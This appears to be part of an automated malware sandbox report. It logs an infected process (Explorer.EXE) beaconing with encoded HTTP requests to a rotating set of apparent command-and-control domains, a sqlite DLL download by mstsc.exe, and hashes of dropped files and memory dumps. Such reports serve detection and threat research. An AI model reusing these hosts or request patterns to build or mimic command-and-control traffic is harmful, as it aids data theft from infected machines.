        http://www.333vvs.com/fpt2/
        Explorer.EXE
        Remote address:
        34.120.175.65:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.333vvs.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.333vvs.com
        Referer: http://www.333vvs.com/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 405 Method Not Allowed
        Server: nginx/1.20.2
        Date: Wed, 22 Nov 2023 05:20:22 GMT
        Content-Type: text/html
        Content-Length: 559
        Via: 1.1 google
        Connection: close
      • GET (remote: US)
        http://www.333vvs.com/fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        34.120.175.65:80
        Request
        GET /fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt- HTTP/1.1
        Host: www.333vvs.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.20.2
        Date: Wed, 22 Nov 2023 05:20:25 GMT
        Content-Type: text/html
        Content-Length: 5208
        Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
        Vary: Accept-Encoding
        ETag: "65267254-1458"
        Cache-Control: no-cache
        Accept-Ranges: bytes
        Via: 1.1 google
        Connection: close
      • DNS (remote: US)
        www.gdyanjiu.icu
        Explorer.EXE
        Remote address:
        8.8.8.8:53
        Request
        www.gdyanjiu.icu
        IN A
        Response
        www.gdyanjiu.icu
        IN CNAME
        256.93cu.com
        256.93cu.com
        IN A
        8.217.92.5
      • POST (remote: HK)
        http://www.gdyanjiu.icu/fpt2/
        Explorer.EXE
        Remote address:
        8.217.92.5:80
        Request
        POST /fpt2/ HTTP/1.1
        Host: www.gdyanjiu.icu
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Accept-Encoding: gzip, deflate, br
        Origin: http://www.gdyanjiu.icu
        Referer: http://www.gdyanjiu.icu/fpt2/
        Cache-Control: no-cache
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 183
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Wed, 22 Nov 2023 05:20:31 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
      • GET (remote: HK)
        http://www.gdyanjiu.icu/fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt-
        Explorer.EXE
        Remote address:
        8.217.92.5:80
        Request
        GET /fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt- HTTP/1.1
        Host: www.gdyanjiu.icu
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Wed, 22 Nov 2023 05:20:34 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
      Flows (destination, protocol, process, bytes sent / received, packets sent / received, then request and response status):

      • 136.243.92.92:80  http  Explorer.EXE  680 B / 1.2kB  5 / 5
        GET http://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt- → 301
      • 45.33.6.223:80  http  mstsc.exe  9.3kB / 504.5kB  194 / 365
        GET http://www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip → 200
      • 91.194.2.86:80  http  Explorer.EXE  1.2kB / 13.5kB  10 / 13
        POST http://www.finebb.net/fpt2/ → 301
      • 91.194.2.86:80  http  Explorer.EXE  908 B / 13.6kB  10 / 14
        GET http://www.finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt- → 301
      • 34.92.57.107:80  http  Explorer.EXE  961 B / 863 B  5 / 4
        POST http://www.yf168vip.com/fpt2/ → 404
      • 34.92.57.107:80  http  Explorer.EXE  680 B / 903 B  5 / 5
        GET http://www.yf168vip.com/fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt- → 404
      • 13.248.169.48:80  http  Explorer.EXE  1.0kB / 1.1kB  6 / 5
        POST http://www.shortfall.net/fpt2/ → 405
      • 13.248.169.48:80  http  Explorer.EXE  1.0kB / 13.9kB  13 / 18
        GET http://www.shortfall.net/fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt- → 200
      • 203.161.61.170:80  http  Explorer.EXE  961 B / 1.0kB  5 / 4
        POST http://www.tecverse.xyz/fpt2/ → 404
      • 203.161.61.170:80  http  Explorer.EXE  680 B / 1.1kB  5 / 5
        GET http://www.tecverse.xyz/fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt- → 404
      • 185.83.146.204:80  http  Explorer.EXE  970 B / 401 B  5 / 4
        POST http://www.hreeremaeps.com/fpt2/ → 404
      • 185.83.146.204:80  http  Explorer.EXE  683 B / 441 B  5 / 5
        GET http://www.hreeremaeps.com/fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt- → 404
      • 208.91.197.132:80  http  Explorer.EXE  884 B / 92 B  3 / 2
        POST http://www.shopbons-mall.com/fpt2/ (no response recorded)
      • 208.91.197.132:80
        http://www.shopbons-mall.com/fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt-
        http
        Explorer.EXE
        1.1kB
        20.4kB
        13
        19

        HTTP Request

        GET http://www.shopbons-mall.com/fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt-

        HTTP Response

        200
      • 188.114.96.0:80
        http://www.cmmug.asia/fpt2/
        http
        Explorer.EXE
        1.1kB
        7.5kB
        8
        9

        HTTP Request

        POST http://www.cmmug.asia/fpt2/

        HTTP Response

        502
      • 188.114.96.0:80
        http://www.cmmug.asia/fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt-
        http
        Explorer.EXE
        678 B
        981 B
        5
        5

        HTTP Request

        GET http://www.cmmug.asia/fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt-

        HTTP Response

        502
      • 34.120.175.65:80
        http://www.333vvs.com/fpt2/
        http
        Explorer.EXE
        955 B
        907 B
        5
        4

        HTTP Request

        POST http://www.333vvs.com/fpt2/

        HTTP Response

        405
      • 34.120.175.65:80
        http://www.333vvs.com/fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt-
        http
        Explorer.EXE
        770 B
        5.9kB
        7
        9

        HTTP Request

        GET http://www.333vvs.com/fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt-

        HTTP Response

        200
      • 8.217.92.5:80
        http://www.gdyanjiu.icu/fpt2/
        http
        Explorer.EXE
        961 B
        863 B
        5
        4

        HTTP Request

        POST http://www.gdyanjiu.icu/fpt2/

        HTTP Response

        404
      • 8.217.92.5:80
        http://www.gdyanjiu.icu/fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt-
        http
        Explorer.EXE
        680 B
        903 B
        5
        5

        HTTP Request

        GET http://www.gdyanjiu.icu/fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt-

        HTTP Response

        404
      • 8.8.8.8:53
        www.ljwixsb.top
        dns
        Explorer.EXE
        61 B
        131 B
        1
        1

        DNS Request

        www.ljwixsb.top

      • 8.8.8.8:53
        www.mobdigim.com
        dns
        Explorer.EXE
        62 B
        92 B
        1
        1

        DNS Request

        www.mobdigim.com

        DNS Response

        136.243.92.92

      • 8.8.8.8:53
        www.sqlite.org
        dns
        mstsc.exe
        60 B
        76 B
        1
        1

        DNS Request

        www.sqlite.org

        DNS Response

        45.33.6.223

      • 8.8.8.8:53
        www.finebb.net
        dns
        Explorer.EXE
        60 B
        76 B
        1
        1

        DNS Request

        www.finebb.net

        DNS Response

        91.194.2.86

      • 8.8.8.8:53
        www.yf168vip.com
        dns
        Explorer.EXE
        62 B
        111 B
        1
        1

        DNS Request

        www.yf168vip.com

        DNS Response

        34.92.57.107

      • 8.8.8.8:53
        www.shortfall.net
        dns
        Explorer.EXE
        63 B
        95 B
        1
        1

        DNS Request

        www.shortfall.net

        DNS Response

        13.248.169.48
        76.223.54.146

      • 8.8.8.8:53
        www.tecverse.xyz
        dns
        Explorer.EXE
        62 B
        78 B
        1
        1

        DNS Request

        www.tecverse.xyz

        DNS Response

        203.161.61.170

      • 8.8.8.8:53
        www.hreeremaeps.com
        dns
        Explorer.EXE
        65 B
        95 B
        1
        1

        DNS Request

        www.hreeremaeps.com

        DNS Response

        185.83.146.204

      • 8.8.8.8:53
        www.shopbons-mall.com
        dns
        Explorer.EXE
        67 B
        83 B
        1
        1

        DNS Request

        www.shopbons-mall.com

        DNS Response

        208.91.197.132

      • 8.8.8.8:53
        www.cmmug.asia
        dns
        Explorer.EXE
        60 B
        92 B
        1
        1

        DNS Request

        www.cmmug.asia

        DNS Response

        188.114.96.0
        188.114.97.0

      • 8.8.8.8:53
        www.333vvs.com
        dns
        Explorer.EXE
        60 B
        92 B
        1
        1

        DNS Request

        www.333vvs.com

        DNS Response

        34.120.175.65
        35.244.161.158

      • 8.8.8.8:53
        www.gdyanjiu.icu
        dns
        Explorer.EXE
        62 B
        104 B
        1
        1

        DNS Request

        www.gdyanjiu.icu

        DNS Response

        8.217.92.5

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe (200KB)
        MD5     e2b11a71264882a61a309c24903c5696
        SHA1    5341f71ee94eb7e32f0fb588a5fe95ebbf06e772
        SHA256  b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5
        SHA512  bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

      • C:\Users\Admin\AppData\Local\Temp\pqndp.yn (250KB)
        MD5     daf88cc0b867ad283c8de71074574e3d
        SHA1    3f70e96bd3daa0e0dd2db29c14cc3dd7ea8239e9
        SHA256  9ce0418bda184b005a58c40a535740cb0b4a5bd946f4fd913512109915831e08
        SHA512  76f62207afc5268c6e43317f412409322449febaf1ea9765153b95e394d2494b935eaf3b46b6f8149ef49d3b199ecad5043b208e6975a4150d1b84722a8f938b

      • C:\Users\Admin\AppData\Local\Temp\tpaxc.zip (478KB)
        MD5     72b88067a5a1a4f8d52c45e6621d13fe
        SHA1    f84542474b8583f4371749282e5cc4d52661c222
        SHA256  70a11669bb8ad1099fd7fba9da92e1a75124bef0d16a01fd10dcdc45e9582092
        SHA512  a8bf75fd4f38e4c8dee5e6f2527062c5be21f5a8bae4ea561f4aa28139d65a6f215afb212f1e4857ee482e16e813fc0d63ef8ec43ec94d5f8a722489e89e154d

      • \Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe (200KB)
        MD5     e2b11a71264882a61a309c24903c5696
        SHA1    5341f71ee94eb7e32f0fb588a5fe95ebbf06e772
        SHA256  b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5
        SHA512  bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

      • \Users\Admin\AppData\Local\Temp\sqlite3.dll (910KB)
        MD5     d79258c5189103d69502eac786addb04
        SHA1    f34b33681cfe8ce649218173a7f58b237821c1ef
        SHA256  57d89a52061d70d87e40281f1196d53273f87860c4d707d667a8c7d9573da675
        SHA512  da797f4dd1ad628aa4e8004b2e00b7c278facbc57a313f56b70dc8fcfbdb0050ea8b025b3475098223cce96ea53537d678273656d46c2d33d81b496d90da34b2

      • memory/1192-35-0x00000000089C0000-0x000000000ABB7000-memory.dmp (34.0MB)
      • memory/1192-79-0x0000000006A20000-0x0000000006B22000-memory.dmp (1.0MB)
      • memory/1192-24-0x00000000089C0000-0x000000000ABB7000-memory.dmp (34.0MB)
      • memory/1192-34-0x0000000006A20000-0x0000000006B22000-memory.dmp (1.0MB)
      • memory/1192-21-0x0000000003760000-0x0000000003860000-memory.dmp (1024KB)
      • memory/1192-33-0x0000000006A20000-0x0000000006B22000-memory.dmp (1.0MB)
      • memory/2152-9-0x00000000001B0000-0x00000000001B2000-memory.dmp (8KB)
      • memory/2552-23-0x00000000003D0000-0x00000000003F3000-memory.dmp (140KB)
      • memory/2552-16-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
      • memory/2552-14-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
      • memory/2552-27-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
      • memory/2552-29-0x00000000003D0000-0x00000000003F3000-memory.dmp (140KB)
      • memory/2552-17-0x00000000008B0000-0x0000000000BB3000-memory.dmp (3.0MB)
      • memory/2552-18-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
      • memory/2552-22-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
      • memory/2552-20-0x0000000000400000-0x000000000043A000-memory.dmp (232KB)
      • memory/2896-32-0x00000000009B0000-0x0000000000A52000-memory.dmp (648KB)
      • memory/2896-30-0x0000000002090000-0x0000000002393000-memory.dmp (3.0MB)
      • memory/2896-36-0x0000000000080000-0x00000000000B6000-memory.dmp (216KB)
      • memory/2896-31-0x0000000000080000-0x00000000000B6000-memory.dmp (216KB)
      • memory/2896-25-0x0000000000080000-0x00000000000B6000-memory.dmp (216KB)
      • memory/2896-77-0x0000000061E00000-0x0000000061ECF000-memory.dmp (828KB)
      • memory/2896-78-0x00000000009B0000-0x0000000000A52000-memory.dmp (648KB)
      • memory/2896-26-0x0000000000080000-0x00000000000B6000-memory.dmp (216KB)
